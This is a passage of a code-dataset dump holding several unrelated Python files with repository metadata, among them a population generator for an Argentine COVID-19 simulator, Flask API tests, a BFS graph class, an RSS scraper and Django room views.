= self.mean\n self.cur_size = 0\n self.cur_idx = self.school_gen.get_school()\n\n def get_school(self):\n if self.cur_size >= self.cur_capacity:\n self._gen_new_school()\n self.cur_size += 1\n return self.cur_idx\n\n\ndef cross_cols(a, b):\n return {c: [f'{c}.{c2}' for c2 in b] for c in a}\n\ndef nearests_zones(geodata, upper_bound=5000, max_nearests=1200, remove_self=True):\n #https://www.eye4software.com/hydromagic/documentation/supported-map-grids/Argentina\n geodata = geodata.to_crs(epsg=5349)\n centroids = np.array(list(zip(geodata.geometry.centroid.x, geodata.geometry.centroid.y)) )\n btree = cKDTree(centroids)\n dist, idx = btree.query(centroids, k=max_nearests, distance_upper_bound=upper_bound)\n idxs = np.stack([dist, idx], axis=2)\n if remove_self:\n condition = lambda d: d>1e-9 and d=3, edad), escuela)\n edad_cross_trabaja = cross_cols(filter(lambda e: int(e)>=14, edad), trabaja)\n urbano_rurales = {}\n tamanios_escuelas = {}\n tamanios = {}\n parentescos = {}\n edades = {}\n sexos = {}\n escuelas = {}\n trabajos = {}\n if prov_id != None:\n geodata = geodata[geodata['prov_id'].astype(int)==prov_id]\n geodata = geodata.sample(frac=frac)\n geodata.sort_values(['prov_id', 'dpto_id'], inplace=True)\n population.geodata = geodata\n\n print(\"Calculating nearests zones...\")\n population.nearest_zones = nearests_zones(geodata, 1000, 1200, remove_self=False)\n areas = np.array(geodata['area'].astype(float))\n poblaciones = np.array(geodata['poblacion'].astype(float))\n population.nearest_densities = [sum(poblaciones[z] for z in zones)/sum(areas[z] for z in zones) for zones in population.nearest_zones]\n school_zones = nearests_zones(geodata, 5000, 1200, remove_self=False)\n\n\n print(\"Generating distributions by deparment...\")\n for index, row in tqdm(census.iterrows(), total=len(census)):\n tamanios_escuelas[row['area']] = {c:row[c] for c in tamanio_escuela}\n tamanios[row['area']] = GenWithDistribution(tamanios_familia, row)\n urbano_rurales[row['area']] = GenWithDistribution(urbano_rural, row)\n parentescos[row['area']] = {k: GenWithDistribution(v, row) for k, v in tamanio_cross_parentescos.items()}\n edades[row['area']] = {k: GenWithDistribution(v, row) for k, v in parentescos_cross_edad.items()}\n sexos[row['area']] = {k: GenWithDistribution(v, row) for k, v in parentescos_cross_sexo.items()}\n escuelas[row['area']] = {k: GenWithDistribution(v, row) for k, v in edad_cross_escuela.items()}\n trabajos[row['area']] = {k: GenWithDistribution(v, row) for k, v in edad_cross_trabaja.items()}\n\n print(\"Generating population...\")\n school_gen = SchoolIdGenerator()\n school_gen_urb = {}\n school_gen_rural = {}\n for zone_id,(_i, row) in enumerate(geodata.iterrows()):\n school_gen_urb[zone_id] = AlumnSchoolIdGenerator(school_gen, tamanios_escuelas[row['dpto_id']]['Alumnos urbano'])\n school_gen_rural[zone_id] = AlumnSchoolIdGenerator(school_gen, tamanios_escuelas[row['dpto_id']]['Alumnos rural'])\n\n es_flia_urbana = []\n expected_people = geodata['poblacion'].sum()\n with tqdm(total=expected_people, unit=\"people\") as progress:\n for zone_id, (_i, row) in enumerate(geodata.iterrows()):\n rural_urbano_flias = urbano_rurales[row['dpto_id']].get(k = int(row['hogares']))\n tamanios_flias = tamanios[row['dpto_id']].get(k = int(row['hogares']))\n parentescos_d = parentescos[row['dpto_id']]\n edades_d = edades[row['dpto_id']]\n sexos_d = sexos[row['dpto_id']]\n escuelas_d = escuelas[row['dpto_id']]\n trabajos_d = trabajos[row['dpto_id']]\n by_parentesco = defaultdict(list)\n for tam_flia, urbano in zip(tamanios_flias, rural_urbano_flias):\n urbano = urbano=='Urbano'\n tam_flia_num = int(tam_flia.replace('8 o más', str(random.choices(range(8, 16))[0])))\n parentescos_flia = parentescos_d[tam_flia].get(k=tam_flia_num)\n family_id = len(population.families)\n es_flia_urbana.append(urbano)\n population.families.append(Family(family_id, zone_id, population.get_dpto_id(row['dpto_id']), population.get_prov_id(row['prov_id'])))\n for member in parentescos_flia:\n id = len(population.people)\n by_parentesco[member].append(id)\n population.people.append(Person(id, family_id, None, None, 0, False))\n progress.update()\n by_edad = defaultdict(list)\n for parentesco, people in by_parentesco.items():\n edades_par = edades_d[parentesco].get(len(people))\n sexo_par = sexos_d[parentesco].get(len(people))\n for p,edadv,sexov in zip(people, edades_par, sexo_par):\n population.people[p].edad = edadv\n population.people[p].sexo = sexov\n by_edad[edadv].append(p)\n for edadv, people in by_edad.items():\n if int(edadv)>=3:\n estudian = escuelas_d[edadv].get(len(people))\n for p,estudiav in zip(people, estudian):\n es_urbana = es_flia_urbana[population.people[p].family]\n if estudiav == 'Asiste':\n population.people[p].escuela = school_gen_urb[random.choice(school_zones[zone_id])].get_school() if es_urbana else school_gen_rural[random.choice(school_zones[zone_id])].get_school()\n else:\n population.people[p].escuela = 0\n if int(edadv)>=14:\n trabajan = trabajos_d[edadv].get(len(people))\n for p,trabajav in zip(people, trabajan):\n if trabajav == 'Ocupado':\n population.people[p].trabajo = 1 #TODO: add work enviroments\n else:\n population.people[p].trabajo = 0\n\n population.calculate_ids()\n\n geo_bydpto = geodata.groupby('dpto_id')[['poblacion', 'area']].sum().reset_index().set_index('dpto_id')\n geo_bydpto['density'] = geo_bydpto['poblacion']/geo_bydpto['area']\n population.department_densities = [geo_bydpto['density'][dpto] for dpto in population.departments]\n geo_byprov = geodata.groupby('prov_id')[['poblacion', 'area']].sum().reset_index().set_index('prov_id')\n geo_byprov['density'] = geo_byprov['poblacion']/geo_byprov['area']\n population.province_densities = [geo_byprov['density'][prov] for prov in population.provinces]\n return population\n\n\ndef main():\n generate(prov_id=66, frac=1.0).to_dat(os.path.join(DATA_DIR, 'fake_population_small.dat'), os.path.join(DATA_DIR, 'fake_population_small.json'), os.path.join(DATA_DIR, 'fake_population_small.gpkg'))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vmartinv/simulator-covid-19-argentina","sub_path":"gen_dbs/fake_population_generator.py","file_name":"fake_population_generator.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"19562109703","text":"import cv2\nfrom keras.preprocessing import image\nimport numpy as np\nimport os\nfrom zipfile import ZipFile\n\n\ndef read_path(folder_path, size):\n \"\"\"\n Convert all files in a folder to images. Your return is used in\n `model.predictions()`.\n\n The size of the images are change to 32x32 (model input size) only for\n use in `model.predictions`.\n \"\"\"\n images = []\n for img in os.listdir(folder_path):\n img = os.path.join(folder_path, img)\n img = image.load_img(img, target_size=size)\n img = image.img_to_array(img)\n img = np.expand_dims(img, axis=0)\n images.append(img)\n\n images = np.vstack(images)\n\n return images\n\n\ndef zip_path(path, files):\n with ZipFile(path, 'w') as zip:\n for file in files:\n file = file.replace('jpg', 'png')\n zip.write(file)\n\n\ndef rotate(path, image, orientation, save_path):\n rotated_dict = {\n '0': 270, # rotated_left\n '1': 90, # rotated_right\n '2': 0, # upright\n '3': 180, # upside_down\n }\n\n img = cv2.imread(path + '/' + image)\n\n (h, w) = img.shape[:2]\n center = (w / 2, h / 2)\n scale = 1.0\n\n M = cv2.getRotationMatrix2D(center, rotated_dict.get(orientation), scale)\n img = cv2.warpAffine(img, M, (h, w))\n\n image = image.replace('jpg', 'png')\n cv2.imwrite(save_path + '/' + image, img)\n\n return img\n","repo_name":"naanadr/correct_orientation","sub_path":"utils/work_images.py","file_name":"work_images.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14074754492","text":"from nose.tools import *\nfrom test_helper import AppTestCase\nimport json\nimport datetime\n\nclass ApiTest(AppTestCase):\n\n def create_event(self, event_data):\n for k in [\"id\", \"modified_date\", \"created_date\"]:\n event_data.pop(k, None)\n\n response = self.post_json(\"/events\", event_data)\n event_data[\"id\"] = response.json[\"event\"][\"id\"]\n return (event_data, response)\n\n def create_sample_event(self):\n event_json = self.read_file(\"./tests/sample_event.json\")\n event_data = json.loads(event_json)\n return self.create_event(event_data)\n\n def create_sample_location(self, event_id):\n location_json = self.read_file(\"./tests/sample_location.json\")\n location_data = json.loads(location_json)\n location_data[\"event_id\"] = event_id\n\n for k in [\"id\", \"modified_date\", \"created_date\"]:\n location_data.pop(k, None)\n\n response = self.post_json(\"/locations\", location_data)\n location_data[\"id\"] = response.json[\"location\"][\"id\"]\n return(location_data, response)\n\n def test_fetching_events(self):\n response = self.client.get(\"/events\")\n assert_equal(response.status_code, 200)\n assert_equal([], response.json)\n\n def test_creating_an_event(self):\n event_data, response = self.create_sample_event()\n assert_equal(response.status_code, 200)\n\n event_id = response.json[\"event\"][\"id\"]\n response = self.client.get(\"/events/%s\" % event_id)\n assert_equal(response.status_code, 200)\n assert_equal(event_data[\"name\"], response.json[\"name\"])\n\n response = self.client.get(\"/events\")\n assert_equal(1, len(response.json))\n\n def test_fetching_locations(self):\n response = self.client.get(\"/locations\")\n assert_equal(response.status_code, 200)\n assert_equal([], response.json)\n\n def test_creating_a_location(self):\n\n # Create an event for our location to point to\n event_data, event_response = self.create_sample_event()\n\n location_data, response = self.create_sample_location(event_response.json[\"event\"][\"id\"])\n\n assert_equal(response.status_code, 200)\n location_id = response.json[\"location\"][\"id\"]\n response = self.client.get(\"/locations/%s\" % location_id)\n assert_equal(response.status_code, 200)\n assert_equal(location_data[\"name\"], response.json[\"name\"])\n response = self.client.get(\"/locations\")\n assert_equal(1, len(response.json))\n\n def test_reading_event_attributes(self):\n self.create_sample_event()\n\n expected_attrs = [u\"name\", u\"start_date\", u\"end_date\",\n u\"description\", u\"status\", u\"id\", u\"location_info\", u\"attendee_info\"]\n\n event = self.client.get(\"/events\").json[0]\n assert_equal(sorted(expected_attrs), sorted(event.keys()))\n\n def test_reading_location_attributes(self):\n _, response = self.create_sample_event()\n self.create_sample_location(response.json[\"event\"][\"id\"])\n\n expected_attrs = [u\"id\", u\"name\", u\"contact_email\", u\"contact_phone\",\n u\"contact_family_name\", u\"contact_given_name\",\n u\"host_given_name\", u\"city\", u\"state\",\n u\"address1\", u\"address2\", u\"number_spaces_remaining\",\n u\"spaces_remaining\"]\n\n event = self.client.get(\"/locations\").json[0]\n assert_equal(sorted(expected_attrs), sorted(event.keys()))\n\n def test_event_includes_location_data_if_available(self):\n # Create an event for our location to point to\n event_data, event_response = self.create_sample_event()\n\n location_data, response = self.create_sample_location(event_response.json[\"event\"][\"id\"])\n response = self.client.get(\"/events\")\n event = response.json[0]\n\n assert_equal(location_data[\"name\"], event[\"location_info\"][\"name\"])\n\n def test_can_rsvp_for_an_event(self):\n event_data, event_response = self.create_sample_event()\n event_id = event_data[\"id\"]\n\n user_info = {\"name\": \"Horace\", \"email\": \"h@example.com\"}\n\n path = \"/events/%s/attendees\" % event_id\n response = self.post_json(path, user_info)\n\n assert_equal(response.status_code, 200)\n assert_equal([user_info], response.json)\n\n updated_event = self.client.get(\"/events/%s\" % event_id).json\n\n assert_equal([user_info], updated_event[\"attendee_info\"])\n\n\n def test_duplicate_rsvps_get_ignored(self):\n event_data, event_response = self.create_sample_event()\n event_id = event_data[\"id\"]\n\n user_info = {\"name\": \"Horace\", \"email\": \"h@example.com\"}\n\n path = \"/events/%s/attendees\" % event_id\n response = self.post_json(path, user_info)\n\n assert_equal(response.status_code, 200)\n assert_equal([user_info], response.json)\n\n response = self.post_json(path, user_info)\n assert_equal(response.status_code, 200)\n assert_equal([user_info], response.json)\n\n def test_removing_an_rsvp(self):\n event_data, event_response = self.create_sample_event()\n event_id = event_data[\"id\"]\n\n user_info = {\"name\": \"Horace\", \"email\": \"h@example.com\"}\n\n path = \"/events/%s/attendees\" % event_id\n response = self.delete_json(path, user_info)\n\n assert_equal(response.status_code, 200)\n assert_equal([], response.json)\n\n def test_returns_events_in_chronological_order_of_start_date(self):\n times = []\n for offset in [5,30,100]:\n times.append(datetime.datetime.now() + datetime.timedelta(hours=offset))\n\n # \"start_date\": \"2015-08-22 17:00:00\",\n serialized_times = []\n for t in times:\n serialized_times.append(t.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n soonest, sooner, soon = serialized_times\n\n e1 = {\"start_date\": sooner}\n e2 = {\"start_date\": soonest}\n e3 = {\"start_date\": soon}\n\n for e in [e1,e2,e3]:\n self.create_event(e)\n\n all_events = self.client.get(\"/events\").json\n recv_times = []\n\n # have to convert them back to the matching format....\n for e in all_events:\n time = datetime.datetime.strptime(e[\"start_date\"], \"%a, %d %b %Y %H:%M:%S %Z\")\n recv_times.append(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n assert_equal([soonest, sooner, soon], recv_times)\n\n def test_events_are_paginated(self):\n names = []\n for i in range(12):\n names.append(\"Event #%s\" % i)\n\n for n in names:\n self.create_event({\"name\": n})\n\n all_events = self.client.get(\"/events\").json\n assert_equal(len(all_events), 10)\n\n all_events = self.client.get(\"/events?page=2\").json\n assert_equal(len(all_events), 2)\n\n all_events = self.client.get(\"/events?page=-50\").json\n assert_equal(len(all_events), 10)\n","repo_name":"worace/hfa_events","sub_path":"backend/tests/api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12564569478","text":"revenue = float(input('Сколько в этом периоде выручили: '))\ncosts = float(input('Сколько в этом месяце потратили: '))\nprofitability = 0\nprofit = revenue - costs\n\nif revenue < costs:\n print('Казна пустеет, Милорд!')\nelif revenue == costs:\n print('Нужно боольше золота!')\nelse:\n print('Работем в плюс, красавчик!')\n profitability = profit / revenue\n manNumber = int(input('Сколько нас трудилось: '))\n usefulness = profit / manNumber\n print('Каждый нам сдлал: ', usefulness)\n","repo_name":"Evgded/Python","sub_path":"Dz15PonomarevP.py","file_name":"Dz15PonomarevP.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27322840400","text":"import csv\nimport numpy\n\n\ndef dict_from_csv(): # функция из файла делает словарь, ключ - это объем, данные - это дата.\n with open(\"history/MRNA1.csv\") as File:\n reader = csv.DictReader(File) # открытие файла как словаря\n dict_from_csv = {}\n for row in reader:\n dict_from_csv[row['Volume']] = row['Date']\n return dict_from_csv\n# print(dict_from_csv())\n\n\ndef list_from_csv_vol(): # Функция из столбца файла делает список, преобразует в цифры.\n with open(\"history/MRNA1.csv\") as File:\n reader = csv.DictReader(File) # открытие файла как словаря\n volume_as_list = []\n for row in reader:\n volume_as_list.append(row['Volume']) # Столбец с объемом превращаем в список\n if 'Volume' in list_from_csv_vol:\n list_from_csv_vol.remove('Volume')\n for i in range(0, len(volume_as_list)):\n volume_as_list[i] = int(volume_as_list[i]) # преобразуем элементы списка из строк в int\n return volume_as_list\n\n\na = max(list_from_csv_vol()[-30:-1])\nb = dict_from_csv()[str(a)]\n\naverage_of_volume = numpy.round(numpy.mean(list_from_csv_vol()))\n\nfor x in list_from_csv_vol():\n if x >= average_of_volume * 3:\n print(dict_from_csv()[str(x)])\n\n","repo_name":"i5ilya/StockAnalyzeVolume","sub_path":"old_versions_manual_git/working_func.py","file_name":"working_func.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16716242943","text":"def solution(numbers, target):\n q = [0]\n j = 0\n while j < len(numbers): # 최대 데이터 수는 2**20 약 10**6 이하이므로 O(n**2) 써도 됨\n cal_list = [] # 각 인덱스가 증가하면서 계산된 값을 넣어줄 빈 리스트\n for i in q: # q에서 제거하고 추가하는 방식은 오류발생함\n cal_list.append(i + numbers[j]) # 그래서 통째로 바꿔주는 코드가 나음\n cal_list.append(i - numbers[j])\n j += 1 # 인덱스를 for문 완료 후 올려주자\n q = cal_list\n return q.count(target)\n\n\nprint(solution([1, 1, 1, 1, 1], 3))\n","repo_name":"wonn23/algorithm-study","sub_path":"0630/HCW(BFS_DFS)/target_number.py","file_name":"target_number.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42317588859","text":"#Uses python3\nimport sys\nimport math\n\ndef distance(p1,p2):\n return ((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)**0.5\n\ndef minimum_distance(x, y, points):\n result = 0.\n #write your code here\n cost = [float('inf')] * n\n parents = [0] * n\n prioq = []\n cost[0] = 0\n for i in range(n):\n prioq.append([cost[i],i])\n while len(prioq) > 0:\n v = min(prioq)\n for i in range(n):\n if i in [i[1] for i in prioq] and i != v[1] and cost[i] > distance(points[v[1]],points[i]):\n cost[i] = distance(points[v[1]],points[i])\n parents[i] = v[1]\n for j in prioq:\n if j[1] == i:\n prioq[prioq.index(j)][0] = cost[i]\n prioq.remove(v)\n if len(prioq) > 0:\n x = min(prioq)\n result = result + x[0]\n return result\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n x = data[1::2]\n y = data[2::2]\n points = []\n for i in range(n):\n points.append([x[i],y[i]])\n print(\"{0:.9f}\".format(minimum_distance(x, y, points)))\n","repo_name":"anuar-a/DSA-Algorithmic-toolbox","sub_path":"connecting_points.py","file_name":"connecting_points.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17833287052","text":"import queue\n\n\nclass Graph:\n def __init__(self, nVertices):\n self.nVertices = nVertices\n self.adjMatrix = [[0 for j in range(nVertices)]\n for i in range(nVertices)]\n\n def addEdge(self, v1, v2):\n self.adjMatrix[v1][v2] = 1\n self.adjMatrix[v2][v1] = 1\n\n def bfsHelper(self, visited, source):\n q = queue.Queue()\n q.put(source)\n visited[source] = True\n while q.empty() is False:\n u = q.get()\n print(u, end=' ')\n for i in range(self.nVertices):\n if self.adjMatrix[u][i] == 1 and visited[i] is False:\n q.put(i)\n visited[i] = True\n\n def bfs(self):\n visited = [False for i in range(self.nVertices)]\n for i in range(self.nVertices):\n if not visited[i]:\n self.bfsHelper(visited, i)\n\n def __str__(self):\n return str(self.adjMatrix)\n\n\nv, e = [int(x) for x in input().split()[:2]]\ng = Graph(v)\nfor i in range(e):\n a, b = [int(x) for x in input().split()[:2]]\n g.addEdge(a, b)\ng.bfs()\n","repo_name":"aayush19973636/Data-Structures-and-Algorithms","sub_path":"Graphs 1/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"} +{"seq_id":"40613326087","text":"from intcode import IntCode\nfrom pixgrid import Grid\nimport numpy as np\n\nwith open(\"11.dat\", \"r\") as f:\n raw = f.readline()\n code = [int(v) for v in raw.split(\",\")]\n\n\nclass Robot:\n def __init__(self):\n # intcode output buffer\n self.buf = None\n\n # colors\n self.BLACK = 0\n self.WHITE = 1\n\n # directions\n self.UP = 0\n self.DOWN = 1\n self.LEFT = 2\n self.RIGHT = 3\n\n self.coord = (0, 0) # current coord in arbitrarily-sized grid\n self.coords = dict() # visited coords\n self.robdir = self.UP # robot direction\n\n # movement deltas for each turn motion\n # (x,y)\n self.deltas = [\n (0, 1), # up\n (0, -1), # down\n (-1, 0), # left\n (1, 0) # right\n ]\n\n # number of painted squares\n self.painted = 0\n # counter for determining read mode (color or turn direction)\n self.mode = 0\n\n def getdir(self, dir, turn_right):\n # get new turn direction based on current robot direction\n if dir == self.UP:\n return self.RIGHT if turn_right else self.LEFT\n elif dir == self.DOWN:\n return self.LEFT if turn_right else self.RIGHT\n elif dir == self.LEFT:\n return self.UP if turn_right else self.DOWN\n elif dir == self.RIGHT:\n return self.DOWN if turn_right else self.UP\n\n def getdelta(self, curdir, turn_right):\n # get new turn direction and movement delta,\n # based on current direction and turn motion (left/right)\n newdir = self.getdir(curdir, turn_right)\n return (newdir, self.deltas[newdir])\n\n def send_square(self):\n if self.coord in self.coords:\n # get color of already visited square\n return self.coords[self.coord]\n if self.mode == 0:\n # initial state: starting on a white square\n return self.WHITE\n else:\n # unvisited squares are black\n return self.BLACK\n\n def read_robot(self, v):\n # mode\n # * odd: turn direction\n # * even: color\n if self.mode % 2:\n # got turn command, read color command from buffer\n c = self.buf\n d = v\n # color\n if self.coord in self.coords:\n if self.coords[self.coord] != c:\n # change color of already painted square\n self.coords[self.coord] = c\n # misunderstood instructions. thought these should count as\n # painted for part A...\n # but nope, no need for 'self.painted += 1' here\n else:\n # paint new square\n self.coords[self.coord] = c\n if c == self.WHITE:\n self.painted += 1\n # turn direction\n newdir, delta = self.getdelta(self.robdir, d)\n self.robdir = newdir\n xd, yd = delta\n self.coord = (self.coord[0] + xd, self.coord[1] + yd)\n # clear command buffer\n self.buf = None\n else:\n # got color command, store it in buffer\n self.buf = v\n self.mode += 1\n\n\nic = IntCode(code)\nrob = Robot()\n\nic.set_input_func(rob.send_square)\nic.set_output_func(rob.read_robot)\nic.parse()\n\nprint(\"Painted squares:\")\nprint(rob.painted)\n\n# and now for the obligatory ugly hard-coding to finalize it all!\nmaxx, maxy, minx, miny = 0, 0, 0, 0\nfor k, v in rob.coords.items():\n # get max and min grid coords\n x, y = k\n maxx = max(x, maxx)\n minx = min(x, minx)\n maxy = max(y, maxy)\n miny = min(y, miny)\n\n# grid size\nw = maxx - minx\nh = maxy - miny\n\n# create grid and plot points in it\ng = Grid(w, h + 1) # account for overflow\nfor k, v in rob.coords.items():\n if v:\n x, y = k\n # invert negative y. in space there's no real concept of up or down ;-)\n y *= -1\n g.plot(x, y)\n\nprint(\"Solution for B:\")\ng.to_ascii()\n","repo_name":"mxgordon/advent_of_code","sub_path":"2019/day11/sol/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26074029416","text":"import cv2\nimport os\n\n# import cv2\n# print(cv2.__version__)\n# vidcap = cv2.VideoCapture('big_buck_bunny_720p_5mb.mp4')\n# success,image = vidcap.read()\n# count = 0\n# success = True\n# # os.makedirs('/data')\n# while success:\n# cv2.imwrite(\"./data/%010d.jpg\" % count, image) # save frame as JPEG file\n# success,image = vidcap.read()\n# print( 'Read a new frame: ', success)\n# count += 1\n\nvideo = cv2.VideoCapture('big_buck_bunny_720p_5mb.mp4')\nnum = 0\nret = True\nwhile ret:\n ret, frame = video.read()\n if not num % 60:\n print(num)\n # cv2.imwrite(\"./data/%010d.jpg\" % num, frame)\n # print('Recording frame No ', num)\n num += 1\n","repo_name":"Horizont32/work","sub_path":"video_frames.py","file_name":"video_frames.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"16306015340","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\"\"\"\n\n \"\"\"One Pass approach, time n, space 1\"\"\"\n\n def maxProfit(self, prices: List[int]) -> int:\n\n if not prices:\n return 0\n\n max_profit = 0\n low_p = prices[0]\n\n for p in prices[1:]:\n low_p = min(low_p, p)\n max_profit = max(max_profit, p - low_p)\n\n return max_profit\n","repo_name":"RunkunXie/LeetCode","sub_path":"Problems/src/121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13738302559","text":"from __future__ import absolute_import\nimport os\nfrom celery import Celery\nimport rss_funcs as rss\nimport extractive_summarizer_funcs as summ\n\n\n# def make_celery(app_name):\n# celery = Celery(\n# app_name,\n# broker=\"amqp://localhost//\",\n# # broker=\"amqps://dizvnogv:DCfzIGZ8dIDpSbCjZz7eMkD6_ImjJ7DR@coyote.rmq.cloudamqp.com/dizvnogv\"\n# )\n\n# # celery.Task = ContextTask\n# return celery\n\n# app = Celery('celery', broker=\"pyamqp://localhost//\")\n\n\n# @app.task\ndef get_content():\n celebrity_links = get_xml_links()\n cat_rss_reject_dict = get_extracted_xml()\n ## Loop through all the categories\n# Initial params\n today = date.today()\n now = datetime.datetime.now()\n curr_hour = now.hour\n\n # Parameters for article summarisation\n num_sents_in_summary = 3\n sentence_threshold = 100\n\n ## Loop through all the names in the category dictioanry\n for name in celebrity_links.keys():\n print('__________________________________________________')\n print('Publisher name: %s' % name)\n try:\n rss_link = celebrity_links[name]\n rss_content_df = rss.get_rss_content_df(rss_link)\n print(rss_content_df.columns)\n ## **Add code here to filter out content not published in the last hour\n reject_p_tags = cat_rss_reject_dict[name]\n\n ## Add code to loop through all the articles in the rss_content_df\n\n for i in range(len(rss_content_df)):\n article_title = rss_content_df.iloc[i]['Title']\n article_url = rss_content_df.iloc[i]['Link']\n try:\n published_dates = rss_content_df.iloc[i]['Published']\n except:\n published_dates = rss_content_df.iloc[i]['Updated']\n published_date_raw = dateutil.parser.parse(published_dates)\n\n published_date = published_date_raw.date()\n if published_date == today:\n hour = (published_date_raw.hour)\n if hour >= curr_hour-3:\n\n article_text, summary_sentences, entity_names, categorized_data, max_img, keywords = get_article_metadata(article_url, reject_p_tags, num_sents_in_summary, sentence_threshold)\n\n # data = []\n test = [article_title, published_dates,summary_sentences,categorized_data,max_img,keywords, entity_names]\n df = pd.DataFrame(test)\n new = df.T\n new.rename(columns = {new.columns[0]: \"article_title\", new.columns[1]: \"published_date\", new.columns[2]: \"summary_sentences\", \n new.columns[3]: \"categorized_data\", new.columns[4]: \"max_img\",\n new.columns[5]: \"keywords\", new.columns[6]: \"entity_names\" }, inplace = True )\n new.to_csv(\"testing.csv\", index=False)\n ##------------- SAVING TO DATABES -------------\n import pymongo\n client = pymongo.MongoClient()\n client = client['Bloverse']\n article_collection = client['articles']\n\n\n # db = client.scraper\n # twitter_user_collection = db.article # similarly if 'testCollection' did not already exist, Mongo would create it\n df = pd.read_csv('testing.csv')\n\n scraped=list(article_collection.find({},{ \"_id\": 0, \"article_tite\": 1})) \n scraped=list((val for dic in scraped for val in dic.values()))\n\n for article_title, published_dates,summary_sentences,categorized_data, max_img, keywords, entity_names in df[['article_title', 'published_date', 'summary_sentences', 'categorized_data', 'max_img', 'keywords', 'entity_names']].itertuples(index=False):\n if article_title not in scraped:\n article_collection.insert_one({'title':article_title, 'publish_date':published_dates, 'Summary': summary_sentences, 'categorized_data': categorized_data,'max_img':max_img,'keywords': keywords, 'entity_names': entity_names}) ####save the df to the collection\n\n\n\n\n except Exception as e:\n print(e)\n print('We were unable to get the content for this publisher, consider deleting them')\n\n print('__________________________________________________')\n\n\napp.conf.beat_schedule = {\n \"see-you-in-ten-seconds-task\": {\n \"task\": \"celery.get_content\",\n \"schedule\": 10.0\n }\n}","repo_name":"nathphoenix/rss_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23371429276","text":"from django.shortcuts import render\nfrom rest_framework import generics, status\nfrom .serializers import RoomSerializer, CreateRoomSerializer, UpdateRoomSerializer\nfrom .models import Room\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\n\n# Create your views here.\nclass RoomView(generics.ListAPIView):\n queryset = Room.objects.all()\n serializer_class = RoomSerializer\n\n# creates a new room\nclass CreateRoomView(APIView):\n serializer_class = CreateRoomSerializer\n\n def post(self, request, format=None):\n # check if user is in session and create if user is not in session\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n \n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n # if serializer is valid, extract data from request and fetch room\n # whose host is the current user\n guest_can_pause = serializer.data.get('guest_can_pause')\n votes_to_skip = serializer.data.get('votes_to_skip')\n host = self.request.session.session_key\n queryset = Room.objects.filter(host=host)\n\n if queryset.exists():\n # if room already exists, update it with new data from the request\n room = queryset[0]\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n self.request.session['room_code'] = room.code\n else:\n # else create a new room with the data from the request\n room = Room(host=host, guest_can_pause = guest_can_pause, votes_to_skip=votes_to_skip)\n\n room.save()\n self.request.session['room_code'] = room.code\n \n return Response(RoomSerializer(room).data, status=status.HTTP_201_CREATED)\n\n# fetches a room\nclass GetRoom(APIView):\n serializer_class = RoomSerializer\n # key by which to filter rooms\n lookup_url_kwarg = 'code'\n\n def get(self, request, format=None):\n code = request.GET.get(self.lookup_url_kwarg)\n\n if code != None:\n room = Room.objects.filter(code=code)\n # if room exists, find whether current user is the host and return data,\n # else return error with appropriate status\n if len(room) > 0:\n data = RoomSerializer(room[0]).data\n data['is_host'] = self.request.session.session_key == room[0].host\n return Response(data, status=status.HTTP_200_OK)\n return Response({'Room not found':'Invalid code'}, status=status.HTTP_404_NOT_FOUND)\n \n # do not query if code is not in request\n return Response({'Bad Request':'Code parameter not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n# handles joining a room\nclass JoinRoom(APIView):\n lookup_url_kwarg = 'code'\n\n def post(self, request, format=None):\n # check and create session for current user if it does not exist\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n \n # get code from the request\n code = request.data.get(self.lookup_url_kwarg)\n if code != None:\n room = Room.objects.filter(code=code)\n\n # check if room with code exists and join if it does. or else return error response\n if len(room) > 0:\n room = room[0]\n self.request.session['room_code'] = code\n return Response({'message':'Room Joined'}, status=status.HTTP_200_OK)\n\n return Response({'Bad Request':'Invalid code, room not found'}, status=status.HTTP_400_BAD_REQUEST)\n \n return Response({'Bad Request':'Invalid code, room not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n# check if user is in the room\nclass 